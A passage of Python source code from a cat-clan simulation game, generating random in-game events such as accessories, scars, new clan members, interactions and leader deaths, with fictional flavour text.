choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n acc_text = []\n chance = randint(0, 50)\n if cat.age in ['kitten', 'adolescent']:\n chance = randint(0, 70)\n elif cat.age in ['young adult', 'adult', 'senior adult', 'elder']:\n chance = randint(0, 150)\n elif cat.trait in ['childish', 'lonesome', 'loving', 'playful', 'shameless', 'strange', 'troublesome']:\n chance = randint(0, 40)\n elif cat.status in ['medicine cat', 'medicine cat apprentice']:\n chance = randint(0, 30)\n if chance == 1:\n if cat.accessory is None:\n cat.accessory = choice([\n choice(plant_accessories),\n choice(wild_accessories)\n ])\n accessory = cat.accessory\n #if self.ceremony_accessory == True:\n # acc_text.extend([f'{other_name} gives {name} something to adorn their pelt as congratulations', f'{name} decides to pick something to adorn their pelt as celebration'])\n if cat.age != 'kitten':\n if cat.accessory in [\"FORGET ME NOTS\", \"BLUEBELLS\", \"POPPY\"]:\n if game.clan.current_season == 'Leaf-bare':\n acc_text.append(f'{name} found a mysterious flower growing in the {choice([\"snow\", \"ice\", \"frost\"])} and decided to wear it')\n else:\n acc_text.extend([f'{name} received a flower from {other_name} and decided to wear it on their pelt',\n f'{name} found a pretty flower and decided to wear it on their pelt', f'A clanmate gave {name} a flower and they decided to wear it'\n ])\n elif cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"] and cat.specialty != \"NOTAIL\" and cat.specialty2 != \"NOTAIL\":\n acc_text.append(f'{name} found a bunch of pretty feathers and decided to wear them')\n elif cat.accessory in [\"HERBS\", \"PETALS\", \"DRY_HERBS\"]:\n acc_text.append(f'{name} always seems to have something stuck in their fur')\n elif cat.accessory in plant_accessories and cat.status in ['medicine cat apprentice', 'medicine cat']:\n acc_text.extend([f'{name} has decided to always bring their {accessory.lower()} with them',\n f'{accessory.lower()} - an item so important to {name} that they always carry it around'.capitalize,\n f'{accessory.lower()} - so vital for {name} that they always have it on them'.capitalize\n ])\n else:\n acc_text.extend([f'{name} finds something interesting and decides to wear it on their pelt', f'A clanmate gives {name} a pretty accessory and they decide to wear it on their pelt',\n f'{name} finds something interesting while out on a walk and decides to wear it on their pelt', f'{name} finds {accessory.lower()} fascinating and decides to wear it on their pelt',\n f'A clanmate gives {name} something to adorn their pelt as a gift', f'{other_name} gives {name} a pretty accessory and they decide to wear it on their pelt'\n ])\n else:\n if cat.accessory in [\"FORGET ME NOTS\", \"BLUEBELLS\", \"POPPY\"]:\n acc_text.extend([f'{name} received a flower from {other_name} and decided to wear it on their pelt',\n f'{name} found a pretty flower and decided to wear it on their pelt', f'A clanmate gave {name} a flower and they decided to wear it'\n ])\n elif cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"] and cat.specialty != \"NOTAIL\" and cat.specialty2 != \"NOTAIL\":\n acc_text.append(f'{name} was playing with feathers earlier and decided to wear some of them')\n elif cat.accessory in [\"HERBS\", \"PETALS\", \"DRYHERBS\"]:\n acc_text.append(f'{name}\\'s parents try their best to groom them, but something is always stuck in their fur')\n else: \n acc_text.extend([f'{name} seems to have picked something up while playing out in the camp', f'{name} finds something interesting and decides to wear it on their pelt',\n f'A clanmate gives {name} a pretty accessory and they decide to wear it on their pelt', f'{other_name} gives {name} a pretty accessory and they decide to wear it on their pelt',\n f'{name} is so cute that they are given {accessory.lower()} as a gift', f'{name} starts to wear {accessory.lower()} on their pelt after their friend gave it to them',\n f'{name} was playing with {accessory.lower()} earlier and has decided to use it to adorn themselves'\n ])\n if acc_text:\n game.cur_events_list.append(choice(acc_text))\n if self.ceremony_accessory:\n self.ceremony_accessory = False \n\n def gain_scars(self, cat):\n if cat.specialty is not None and cat.specialty2 is not None or cat.age == 'kitten':\n return\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n scar_chance = randint(0, 40)\n clancats = int(self.living_cats)\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n scar_text = []\n clan_has_kits = any(\n str(cat.status) in \"kitten\"\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n if clancats > 45:\n scar_chance = scar_chance + 20\n elif clancats > 120:\n scar_chance = scar_chance * 2\n elif clancats > 300:\n scar_chance = scar_chance + 80\n else:\n scar_chance = scar_chance\n if cat.age in ['adolescent', 'young adult']:\n chance = scar_chance\n elif cat.age in ['adult', 'senior adult']:\n chance = scar_chance + 10\n elif cat.age in [\n 'apprentice', 'medicine cat apprentice'\n ] and cat.mentor.ID == other_cat.ID and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n chance = scar_chance - 15\n elif other_cat.status in ['leader', 'deputy'] and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n chance = scar_chance\n else:\n chance = scar_chance\n if chance == 1:\n if cat.specialty is None:\n cat.specialty = choice([\n choice(scars1),\n choice(scars2),\n choice(scars4),\n choice(scars5)\n ])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]))\n elif cat.specialty == 'SNAKE':\n scar_text.append(f'{name} was bit by a snake but lived')\n elif cat.specialty == 'TOETRAP':\n scar_text.append(\n f'{name} got their paw stuck in a twoleg trap and earned a scar'\n )\n else:\n scar_text.extend([\n f'{name} earned a scar fighting a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]), f'{name} earned a scar defending the territory',\n f'{name} earned a scar protecting the kits',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after accidentally wandering over the border',\n f'{name} is injured after messing with a twoleg object'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([\n choice(scars1),\n choice(scars2),\n choice(scars4),\n choice(scars5)\n ])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]))\n elif cat.specialty2 == 'SNAKE' and cat.specialty != 'SNAKE':\n scar_text.append(f'{name} was bit by a snake but lived')\n elif cat.specialty2 == 'TOETRAP' and cat.specialty != 'TOETRAP':\n scar_text.append(\n f'{name} got their paw stuck in a twoleg trap and earned a scar'\n )\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar fighting a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]), f'{name} earned a scar defending the territory',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after accidentally wandering over the border',\n f'{name} is injured after messing with a twoleg object',\n f'{name} is injured after a fight broke out with ' +\n other_name\n ])\n\n elif chance == 1 and cat.status in [\n 'apprentice', 'medicine cat apprentice'\n ] and cat.mentor.ID == other_cat.ID and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(\n f'{name} recklessly lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' encouraged by their mentor')\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar recklessly fighting a ' +\n choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]) + ' encouraged by their mentor',\n f'{name} earned a scar for not defending the territory well enough',\n f'{name} is injured after being pushed into a river',\n f'{name} is punished by their mentor after accidentally wandering over the border',\n f'{name} is injured by their mentor after being caught messing with a twoleg object'\n f'{name} is injured by their mentor while practicing with their claws out',\n f'{name}\\'s mentor punished them for disobeying',\n f'{name} gained a scar while fighting their mentor',\n f'{name} is injured while practicing their battle moves with '\n + other_name,\n f'{name} is injured after a fight broke out with ' +\n other_name,\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result',\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' encouraged by their mentor')\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar recklessly fighting a ' +\n choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]) + ' encouraged by their mentor',\n f'{name} earned a scar for not defending the territory well enough',\n f'{name} is injured after being pushed into a river',\n f'{name} is punished by their mentor after accidentally wandering over the border',\n f'{name} is injured by their mentor after being caught messing with a twoleg object'\n f'{name} is injured by their mentor while practicing with their claws out',\n f'{name}\\'s mentor punished them for disobeying',\n f'{name} gained a scar while fighting their mentor',\n f'{name} is injured while practicing their batle moves with '\n + other_name,\n f'{name} is injured after a fight broke out with ' +\n other_name,\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result'\n ])\n\n elif chance == 1 and cat.status in [\n 'warrior', 'deputy', 'medicine cat'\n ] and other_cat.status == 'leader':\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders, {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object'\n ])\n\n elif chance == 1 and other_cat.status == 'leader' and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic',\n 'controlling', 'fierce', 'petty'\n ]:\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders, {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object',\n f'{name} is injured while fighting a clanmate encouraged by '\n + other_name, f'{name} is injured by ' + other_name +\n ' for disobeying orders', f'{name} is injured by ' +\n other_name + ' for speaking out against them',\n f'{name} is cruelly injured by ' + other_name +\n ' to make an example out of them'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object',\n f'{name} is injured while fighting a clanmate encouraged by '\n + other_name, f'{name} is injured by ' + other_name +\n ' for disobeying orders', f'{name} is injured by ' +\n other_name + ' for speaking out against them',\n f'{name} is cruelly injured by ' + other_name +\n ' to make an example out of them'\n ])\n\n if scar_text:\n game.cur_events_list.append(choice(scar_text))\n\n def invite_new_cats(self, cat):\n chance = 100\n if self.living_cats < 10:\n chance = 100\n elif self.living_cats > 50:\n chance = 700\n elif self.living_cats > 30:\n chance = 300\n if randint(1, chance\n ) == 1 and cat.age != 'kitten' and cat.age != 'adolescent':\n self.new_cat_invited = True\n name = str(cat.name)\n type_of_new_cat = choice([1, 2, 3, 4, 5, 6, 7])\n if type_of_new_cat == 1:\n kit = Cat(moons=0)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, kit))\n relationships.append(Relationship(kit, the_cat))\n kit.relationships = relationships\n game.clan.add_cat(kit)\n kit_text = [\n f'{name} finds an abandoned kit and names them {str(kit.name)}',\n f'A loner brings their kit named {str(kit.name.prefix)} to the clan, stating they no longer can care for them'\n ]\n game.cur_events_list.append(choice(kit_text))\n self.check_age(kit)\n\n elif type_of_new_cat == 2:\n self._extracted_from_invite_new_cats_19(name)\n\n elif type_of_new_cat == 3:\n loner = Cat(status='warrior', moons=randint(12, 120))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n loner.skill = 'formerly a loner'\n game.clan.add_cat(loner)\n loner_text = [\n f'{name} finds a loner who joins the clan',\n f'A loner says that they are interested in clan life and joins the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n 'The loner changes their name to ' + str(loner.name))\n self.check_age(loner)\n\n elif type_of_new_cat == 4:\n warrior = Cat(status='warrior', moons=randint(12, 150))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(\n the_cat, warrior))\n relationships.append(Relationship(warrior, the_cat))\n warrior.relationships = relationships\n game.clan.add_cat(warrior)\n warrior_text = []\n if len(game.clan.all_clans) > 0:\n warrior_text.extend([\n f'{name} finds a warrior from {str(choice(game.clan.all_clans).name)}Clan named {str(warrior.name)} who asks to join the clan',\n f'An injured warrior from {str(choice(game.clan.all_clans).name)}Clan asks to join in exchange for healing'\n ])\n else:\n warrior_text.extend([\n f'{name} finds a warrior from a different clan named {str(warrior.name)} who asks to join the clan'\n ])\n game.cur_events_list.append(choice(warrior_text))\n self.check_age(warrior)\n\n elif type_of_new_cat == 5:\n self._extracted_from_invite_new_cats_47(name)\n elif type_of_new_cat == 6:\n loner = Cat(status='warrior', moons=randint(12, 120))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n self._extracted_from_invite_new_cats_59(loner)\n loner_text = [\n f'{name} finds a kittypet named {choice(names.loner_names)} who wants to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n 'The kittypet changes their name to ' + str(loner.name))\n self.check_age(loner)\n\n elif type_of_new_cat == 7:\n parent1 = cat.name\n kits = choice([1, 1, 2, 2, 2, 3])\n for kit in range(kits):\n if cat.mate is not None:\n kit = Cat(parent1=cat.ID, parent2=cat.mate, moons=0)\n game.clan.add_cat(kit)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n if the_cat.ID in [kit.parent1, kit.parent2]:\n the_cat.relationships.append(\n Relationship(the_cat, kit, False, True))\n relationships.append(\n Relationship(kit, the_cat, False, True))\n else:\n the_cat.relationships.append(\n Relationship(the_cat, kit))\n relationships.append(Relationship(\n kit, the_cat))\n kit.relationships = relationships\n else:\n kit = Cat(parent1=cat.ID, moons=0)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n if the_cat.ID == kit.parent1:\n the_cat.relationships.append(\n Relationship(the_cat, kit, False, True))\n relationships.append(\n Relationship(kit, the_cat, False, True))\n else:\n the_cat.relationships.append(\n Relationship(the_cat, kit))\n relationships.append(Relationship(\n kit, the_cat))\n kit.relationships = relationships\n game.clan.add_cat(kit)\n if len(game.clan.all_clans) > 0:\n Akit_text = ([\n f'{parent1} finds an abandoned litter and decides to adopt them',\n f'A loner leaves their litter to the clan. {str(parent1)} decides to adopt them as their own',\n f'A {str(choice(game.clan.all_clans).name)}Clan queen decides to leave their litter with you. {str(parent1)} takes them as their own'\n ])\n else:\n Akit_text = ([\n f'{parent1} finds an abandoned litter and decides to adopt them as their own',\n f'A loner leaves their litter to the clan. {str(parent1)} decides to adopt them as their own'\n ])\n game.cur_events_list.append(choice(Akit_text))\n self.check_age(kit)\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_59(self, loner):\n loner.skill = 'formerly a kittypet'\n if choice([1, 2]) == 1:\n loner.specialty2 = choice(scars3)\n game.clan.add_cat(loner)\n self.check_age(loner)\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_47(self, name):\n loner_name = choice(names.loner_names)\n loner = Cat(prefix=loner_name,\n gender=choice(['female', 'male']),\n status='warrior',\n moons=randint(12, 120),\n suffix='')\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n self._extracted_from_invite_new_cats_59(loner)\n loner_text = [\n f'{name} finds a kittypet named {str(loner_name)} who wants to join the clan',\n f'A kittypet named {str(loner_name)} stops {name} and asks to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n str(loner_name) + ' decides to keep their name')\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_19(self, name):\n loner_name = choice(names.loner_names)\n loner = Cat(prefix=loner_name,\n gender=choice(['female', 'male']),\n status='warrior',\n moons=randint(12, 120),\n suffix='')\n loner.skill = 'formerly a loner'\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n game.clan.add_cat(loner)\n loner_text = [\n f'{name} finds a loner named {str(loner.name)} who joins the clan',\n f'A loner named {str(loner.name)} waits on the border for a patrol, asking to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n str(loner_name) + ' decides to keep their name')\n self.check_age(loner)\n\n def other_interactions(self, cat):\n if randint(1, 100) != 1:\n return\n interactions = []\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n name = str(cat.name)\n other_name = str(other_cat.name)\n if cat.status in ['warrior', 'deputy'] and randint(\n 1, 15) == 1 and game.settings.get('retirement') is True:\n game.cur_events_list.append(\n f'{name} retires to the elders den after injuries sustained defending {other_name}'\n )\n if cat.status == 'deputy':\n game.clan.deputy = None\n\n cat.status_change('elder')\n return\n if cat.status == 'kitten' and other_cat.status != 'kitten':\n interactions.extend([\n f'{name} is scolded after sneaking out of camp',\n f'{name} falls into a river but is saved by {other_name}'\n ])\n elif cat.status in ['apprentice', 'medicine cat apprentice'] and other_cat.status != 'kitten':\n interactions.extend([\n f'{name} is scolded after sneaking out of camp',\n f'{name} falls into a river but is saved by {other_name}',\n name +\n \" accidentally trespasses onto another clan\\'s territory\"\n ])\n if other_cat.status == 'apprentice':\n interactions.append(\n f'{name} sneaks out of camp with {other_name}')\n elif cat.status == 'warrior':\n interactions.extend([\n name + \" is caught outside of the Clan\\'s territory\",\n f'{name} is caught breaking the Warrior Code',\n f'{name} went missing for a few days',\n f'{name} believes they are a part of the new prophecy'\n ])\n elif cat.status == 'medicine cat':\n interactions.extend([\n f'{name} learns of a new prophecy',\n f'{name} is worried about an outbreak of greencough',\n f'{name} is worried about how low their herb stores has gotten',\n f'{name} visits the other medicine cats'\n ])\n elif cat.status == 'deputy':\n interactions.extend([\n f'{name} thinks about retiring',\n f'{name} travels to the other clans to bring them an important message'\n ])\n elif cat.status == 'leader':\n if game.clan.leader_lives <= 5:\n interactions.extend([\n f'{name} thinks about retiring',\n name + \" confesses they don\\'t have many lives left\"\n ])\n if other_cat.status not in [\n 'kitten', 'apprentice', 'medicine cat apprentice'\n ]:\n interactions.append(\n f'{name} confesses to {other_name} that the responsibility of leadership is crushing them'\n )\n elif other_cat.status == 'apprentice':\n interactions.append(f'{name} assesses {other_name}' +\n \"\\'s progress\")\n interactions.extend([\n f'{name} calls a clan meeting to give an important announcement'\n ])\n elif cat.status == 'elder':\n interactions.extend(\n [f'{name} is brought back to camp after wandering off'])\n if cat.age == other_cat.age:\n interactions.extend([\n f'{name} tries to convince {other_name} to run away together'\n ])\n\n if interactions:\n game.cur_events_list.append(choice(interactions))\n\n def handle_deaths(self, cat):\n clan_has_kits = any(\n str(cat.status) in \"kitten\"\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n #Leader lost a life EVENTS\n if randint(1, 100) == 1:\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.status == 'leader' or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n if cat.status == 'leader':\n other_name = str(other_cat.name)\n cause_of_death = [\n name + ' lost a life after falling into a river',\n name + ' lost a life due to greencough',\n name + ' lost a life due to whitecough',\n 'Lightning fell in camp and ' + name + ' lost a life',\n name + ' was mortally wounded by a fox', name +\n ' lost a life to a dog', name + ' lost a life to a badger',\n name + ' lost a life to a hawk',\n name + ' lost a life due to yellowcough',\n name + ' lost a life while fighting off a rogue',\n name + ' lost a life to an eagle', name +\n ' was grabbed and dropped by an eagle, losing a life',\n name + ' was grabbed and dropped by a hawk, losing a life',\n name + ' lost a life after being swept away by a flood',\n name + ' lost a life after falling off a tree',\n name + ' was bit by a venomous spider and lost a life',\n name + ' was bit by a venomous snake and lost a life',\n name + ' ate poisoned fresh-kill and lost a life', name +\n ' failed to interpret a warning sign from StarClan and lost a life as a result',\n name + ' lost a life defending ' + other_name +\n ' from a dog', name + ' lost a life defending ' +\n other_name + ' from a badger', name +\n ' lost a life defending ' + other_name + ' from a fox',\n name + ' lost a life defending ' + other_name +\n ' from a hawk', name + ' lost a life defending ' +\n other_name + ' from an eagle',\n name + ' lost a life while saving ' + other_name +\n ' from drowning', name + ' lost a life while saving ' +\n other_name + ' from a monster',\n name + ' was pushed under a monster and lost a life',\n name + ' lost a life after saving ' + other_name + ' from a snake'\n ]\n if len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' lost a life defending the kits from ' +\n choice(game.clan.all_clans).name + 'Clan warriors',\n name + ' lost a life defending ' + other_name +\n ' from ' + choice(game.clan.all_clans).name +\n 'Clan warriors', name + ' lost a life to a ' +\n choice(game.clan.all_clans).name + 'Clan apprentice',\n name + ' lost a life to a ' +\n choice(game.clan.all_clans).name + 'Clan warrior'\n ])\n game.clan.leader_lives -= 1\n self.dies(cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n #Several/All Lives loss\n elif randint(1,200) == 1 and cat.status == 'leader': \n name = str(cat.name)\n allorsome = randint(1, 10)\n if cat.status == 'leader':\n if allorsome == 1:\n cause_of_death = [\n name +\n ' was brutally attacked by a rogue and lost all of their lives',\n name +\n ' was mauled by dogs and lost all of their lives',\n name +\n ' was carried off by an eagle, never to be seen again',\n name +\n ' was carried off by a hawk, never to be seen again',\n name + ' was taken by twolegs, never to be seen again',\n name +\n ' fell into a river and was swept away by the current, never to be seen again',\n name +\n ' was burnt alive while trying to save their clanmates from a fire'\n ]\n if self.at_war and len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' was brutally murdered by a ' +\n choice(game.clan.all_clans).name +\n 'Clan warrior and lost all of their lives',\n name + ' was brutally murdered by the ' +\n choice(game.clan.all_clans).name +\n 'Clan deputy and lost all of their lives',\n name + ' was brutally murdered by the ' +\n choice(game.clan.all_clans).name +\n 'Clan leader and lost all of their lives'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was buried alive in an avalanche',\n name + ' was buried alive by a landslide', name +\n ' was pushed off a cliff with sharp rocks at the bottom',\n name +\n ' accidentally fell off a cliff with sharp rocks at the bottom'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name +\n ' was washed out to sea and was never seen again',\n name +\n ' was lost to sea while saving a clanmate from drowning'\n ])\n if game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name +\n ' fell into a sinkhole and was never seen again',\n name +\n ' fell into a hidden burrow and was buried alive',\n name +\n ' was buried alive when a burrow collapsed on them'\n ])\n game.clan.leader_lives -= 10\n else:\n lostlives = choice([2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 6])\n cause_of_death = [\n name + ' lost ' + str(lostlives) +\n ' lives due to greencough', name + ' lost ' +\n str(lostlives) + ' lives due to whitecough',\n name + ' lost ' + str(lostlives) +\n ' lives due to yellowcough', name + ' lost ' +\n str(lostlives) + ' lives due to an illness',\n name + ' lost ' + str(lostlives) +\n ' lives due to an infection'\n ]\n game.clan.leader_lives = game.clan.leader_lives - lostlives\n self.dies(cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n elif randint(1, 400) == 1:\n name = str(cat.name)\n cause_of_death = [\n name + ' was murdered', name + ' died of greencough',\n 'A tree fell in camp and killed ' + name,\n name + ' was found dead near a fox den',\n name + ' was bitten by a snake and died'\n ]\n if clan_has_kits == True and cat.status != 'kitten':\n cause_of_death.extend([\n name + ' was bitten by a snake while saving a kit and died'\n ])\n if cat.status == 'kitten':\n cause_of_death.extend([\n name + ' fell into a river and drowned',\n name + ' was taken by a hawk',\n name + ' grew weak as the days passed and died',\n name + ' was killed after sneaking out of 